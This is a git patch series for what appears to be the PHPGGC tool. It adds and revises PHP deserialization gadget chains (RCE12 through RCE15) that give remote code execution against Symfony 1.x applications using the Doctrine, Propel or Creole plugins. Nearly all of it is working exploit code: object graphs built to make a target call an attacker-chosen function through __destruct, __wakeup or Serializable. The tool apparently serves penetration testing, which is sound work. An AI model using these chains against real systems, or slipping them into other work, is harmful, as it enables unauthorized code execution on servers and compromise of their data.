From 78270d74cfbd09c2a5c14b1737d93b475240f2e3 Mon Sep 17 00:00:00 2001
From: darkpills <>
Date: Thu, 29 Feb 2024 19:31:30 +0100
Subject: [PATCH 1/3] Fixing version description to include the boundaries

---
 gadgetchains/Symfony/RCE/12/chain.php | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/gadgetchains/Symfony/RCE/12/chain.php b/gadgetchains/Symfony/RCE/12/chain.php
index b97921f5..cfe861b5 100755
--- a/gadgetchains/Symfony/RCE/12/chain.php
+++ b/gadgetchains/Symfony/RCE/12/chain.php
@@ -4,11 +4,10 @@
 
 class RCE12 extends \PHPGGC\GadgetChain\RCE\FunctionCall
 {
-    // This chain is still valid for latest version of Symfony 1.15 if it's installed with git clone
-    // which triggers submodules (not via composer)
-    public static $version = '1.3.0 < 1.5.13~17';
+    public static $version = '1.3.0 <= 1.5.13~17';
     public static $vector = '__destruct';
     public static $author = 'darkpills';
+    public static $information = 'Works until 1.5.13, and until 1.5.17 if installed via git method (not composer)';
 
     public function generate(array $parameters)
     {

From 07c9555ef49a392483204562d20d1e07c97ea595 Mon Sep 17 00:00:00 2001
From: darkpills <>
Date: Thu, 29 Feb 2024 23:37:41 +0100
Subject: [PATCH 2/3] Replacing initial chains with alternative chains for
 Symfony 1.x from 1.0.0 to 1.2.12

---
 gadgetchains/Symfony/RCE/13/chain.php   | 38 ++++----------------
 gadgetchains/Symfony/RCE/13/gadgets.php | 46 +++++--------------------
 gadgetchains/Symfony/RCE/14/chain.php   | 20 +++++++++++
 gadgetchains/Symfony/RCE/14/gadgets.php | 42 ++++++++++++++++++++++
 gadgetchains/Symfony/RCE/15/chain.php   | 20 +++++++++++
 gadgetchains/Symfony/RCE/15/gadgets.php | 38 ++++++++++++++++++++
 6 files changed, 136 insertions(+), 68 deletions(-)
 create mode 100755 gadgetchains/Symfony/RCE/14/chain.php
 create mode 100755 gadgetchains/Symfony/RCE/14/gadgets.php
 create mode 100755 gadgetchains/Symfony/RCE/15/chain.php
 create mode 100755 gadgetchains/Symfony/RCE/15/gadgets.php

diff --git a/gadgetchains/Symfony/RCE/13/chain.php b/gadgetchains/Symfony/RCE/13/chain.php
index d3fbe31f..83432af4 100755
--- a/gadgetchains/Symfony/RCE/13/chain.php
+++ b/gadgetchains/Symfony/RCE/13/chain.php
@@ -4,41 +4,17 @@
 
 class RCE13 extends \PHPGGC\GadgetChain\RCE\FunctionCall
 {
-    public static $version = '1.0.0 < 1.2.12';
-    public static $vector = '__destruct';
+    public static $version = '1.2.0 <= 1.2.12';
+    public static $vector = 'Serializable';
     public static $author = 'darkpills';
-
-
-    public function process_serialized($serialized)
-    {
-        $serialized2 = $serialized;
-        
-        // Leveraging PHP Bug #49649
-        // insert the same $output attribute of lime_test class, but with public visibility 
-        // for breaking change between 1.2.8 and 1.2.9 in lime_test attributes
-        $find = '#s:9:".\\*.output";(.*}}})s:10:".\\*.results";#';
-        $replace = 's:9:"'.chr(0).'*'.chr(0).'output";${1}s:6:"output";${1}s:10:"'.chr(0).'*'.chr(0).'results";';
-        $serialized2 = preg_replace($find, $replace, $serialized2);
-
-        // update the number of properties
-        $find = '#"lime_test":8#';
-        $replace = '"lime_test":9';
-        $serialized2 = preg_replace($find, $replace, $serialized2);
-        
-        return $serialized2;
-    }
+    public static $information = 'With sfDoctrinePlugin enabled';
 
     public function generate(array $parameters)
     {
-        $value = array($parameters['parameter']);
-        $escaper1 = new \sfOutputEscaperArrayDecorator($parameters['function'], $value);
-
-        $lime_colorizer = new \lime_colorizer();
-        $escaper2 = new \sfOutputEscaperObjectDecorator(array($escaper1, "current"), $lime_colorizer);
-        
-        $lime_output = new \lime_output_color($escaper2);
-        $lime_test = new \lime_test($lime_output);
+        $escaper = new \sfOutputEscaperArrayDecorator($parameters['function'], array($parameters['parameter']));
 
-        return $lime_test;
+        $pager = new \sfDoctrinePager($escaper);
+    
+        return $pager;
     }
 }
diff --git a/gadgetchains/Symfony/RCE/13/gadgets.php b/gadgetchains/Symfony/RCE/13/gadgets.php
index b3c548fe..305447bc 100644
--- a/gadgetchains/Symfony/RCE/13/gadgets.php
+++ b/gadgetchains/Symfony/RCE/13/gadgets.php
@@ -1,52 +1,24 @@
 <?php
 
-class lime_test
+class sfDoctrinePager implements Serializable
 {
+  protected
+    $prop                 = null;
 
-  protected $output  = null;
-  protected $results = array();
-  protected $options = array();
-
-  public $plan = null;
-  public $test_nb = 1;
-  public $failed = 1;
-  public $passed = 0;
-  public $skipped = 0;
-
-  function __construct($output)
-  {
-    $this->output = $output;
+  public function __construct($prop) {
+    $this->prop = $prop;
   }
-}
-
-class lime_output_color
-{
-  public $colorizer = null;
 
-  function __construct($colorizer)
+  public function serialize()
   {
-    $this->colorizer = $colorizer;
+    return serialize($this->prop);
   }
-}
-
-
-class sfOutputEscaperObjectDecorator
-{
-  protected $value;
 
-  protected $escapingMethod;
-
-  public function __construct($escapingMethod, $value) {
-    $this->escapingMethod = $escapingMethod;
-    $this->value = $value;
+  public function unserialize($serialized)
+  {
   }
 }
 
-class lime_colorizer
-{
-}
-
-
 class sfOutputEscaperArrayDecorator
 {
   protected $value;
diff --git a/gadgetchains/Symfony/RCE/14/chain.php b/gadgetchains/Symfony/RCE/14/chain.php
new file mode 100755
index 00000000..1fb6a0bf
--- /dev/null
+++ b/gadgetchains/Symfony/RCE/14/chain.php
@@ -0,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE14 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.2.0 <= 1.2.12';
+    public static $vector = '__wakeup';
+    public static $author = 'darkpills';
+    public static $information = 'With sfPropelPlugin enabled';
+
+    public function generate(array $parameters)
+    {
+        $escaper = new \sfOutputEscaperObjectDecorator($parameters['function'], new \sfCultureInfo($parameters['parameter']));
+        
+        $date = new \PropelDateTime(null, $escaper);
+
+        return $date;
+    }
+}
diff --git a/gadgetchains/Symfony/RCE/14/gadgets.php b/gadgetchains/Symfony/RCE/14/gadgets.php
new file mode 100755
index 00000000..834b5d90
--- /dev/null
+++ b/gadgetchains/Symfony/RCE/14/gadgets.php
@@ -0,0 +1,42 @@
+<?php
+class PropelDateTime extends DateTime
+{
+  private $dateString;
+
+	private $tzString;
+
+  public function __construct($dateString, $tzString) {
+    $this->dateString = $dateString;
+    $this->tzString = $tzString;
+  }
+}
+
+
+class sfOutputEscaperObjectDecorator
+{
+  protected $value;
+
+  protected $escapingMethod;
+
+  public function __construct($escapingMethod, $value) {
+    $this->escapingMethod = $escapingMethod;
+    $this->value = $value;
+  }
+}
+
+class sfCultureInfo
+{
+  protected $dataFileExt = '.dat';
+  protected $data = array();
+  protected $culture;
+  protected $dataDir;
+  protected $dataFiles = array();
+  protected $dateTimeFormat;
+  protected $numberFormat;
+  protected $properties = array();
+
+  public function __construct($culture) {
+    $this->culture = $culture;
+  }
+
+}
\ No newline at end of file
diff --git a/gadgetchains/Symfony/RCE/15/chain.php b/gadgetchains/Symfony/RCE/15/chain.php
new file mode 100755
index 00000000..1cb75947
--- /dev/null
+++ b/gadgetchains/Symfony/RCE/15/chain.php
@@ -0,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE15 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.0.0 <= 1.1.9';
+    public static $vector = '__wakeup';
+    public static $author = 'darkpills';
+    public static $information = 'With sfPropelPlugin enabled, which contains Creole ORM';
+
+    public function generate(array $parameters)
+    {
+        $escaper = new \sfOutputEscaperArrayDecorator($parameters['function'], array($parameters['parameter']));
+
+        $tableInfo = new \MySQLiTableInfo($escaper);
+    
+        return $tableInfo;
+    }
+}
diff --git a/gadgetchains/Symfony/RCE/15/gadgets.php b/gadgetchains/Symfony/RCE/15/gadgets.php
new file mode 100755
index 00000000..9c4e5672
--- /dev/null
+++ b/gadgetchains/Symfony/RCE/15/gadgets.php
@@ -0,0 +1,38 @@
+<?php
+
+class sfOutputEscaperArrayDecorator
+{
+  protected $value;
+
+  protected $escapingMethod;
+
+  public function __construct($escapingMethod, $value) {
+    $this->escapingMethod = $escapingMethod;
+    $this->value = $value;
+  }
+}
+
+class MySQLiTableInfo 
+{
+
+  protected $name;
+  protected $columns = array();
+  protected $foreignKeys = array();
+  protected $indexes = array();
+  protected $primaryKey;
+  protected $pkLoaded = false;
+  protected $fksLoaded = false;
+  protected $indexesLoaded = false;
+  protected $colsLoaded = false;
+  protected $vendorLoaded = false;
+  protected $vendorSpecificInfo = array();
+  protected $conn;
+  protected $database;
+  protected $dblink;
+  protected $dbname;
+
+  public function __construct($columns)
+  {
+    $this->columns = $columns;
+  }
+}
\ No newline at end of file

From fdc67d85eb694ffb07e9d2253b1e717fa30068a8 Mon Sep 17 00:00:00 2001
From: darkpills <>
Date: Sat, 2 Mar 2024 11:32:21 +0100
Subject: [PATCH 3/3] Fixing description of Symfony/RCE/15

---
 gadgetchains/Symfony/RCE/15/chain.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/gadgetchains/Symfony/RCE/15/chain.php b/gadgetchains/Symfony/RCE/15/chain.php
index 1cb75947..0d94a312 100755
--- a/gadgetchains/Symfony/RCE/15/chain.php
+++ b/gadgetchains/Symfony/RCE/15/chain.php
@@ -7,7 +7,7 @@ class RCE15 extends \PHPGGC\GadgetChain\RCE\FunctionCall
     public static $version = '1.0.0 <= 1.1.9';
     public static $vector = '__wakeup';
     public static $author = 'darkpills';
-    public static $information = 'With sfPropelPlugin enabled, which contains Creole ORM';
+    public static $information = 'With Creole ORM';
 
     public function generate(array $parameters)
     {